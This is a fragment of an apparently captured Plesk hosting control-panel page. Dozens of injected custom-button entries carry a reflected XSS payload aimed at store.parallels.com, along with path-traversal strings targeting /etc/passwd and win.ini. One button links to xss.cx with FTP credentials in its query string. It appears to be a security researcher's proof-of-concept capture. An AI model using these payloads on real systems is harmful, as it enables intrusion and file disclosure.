XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/winnt\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSSfdf080d955073164a20925b1","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=339749585fdadb4623014827567deba3\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
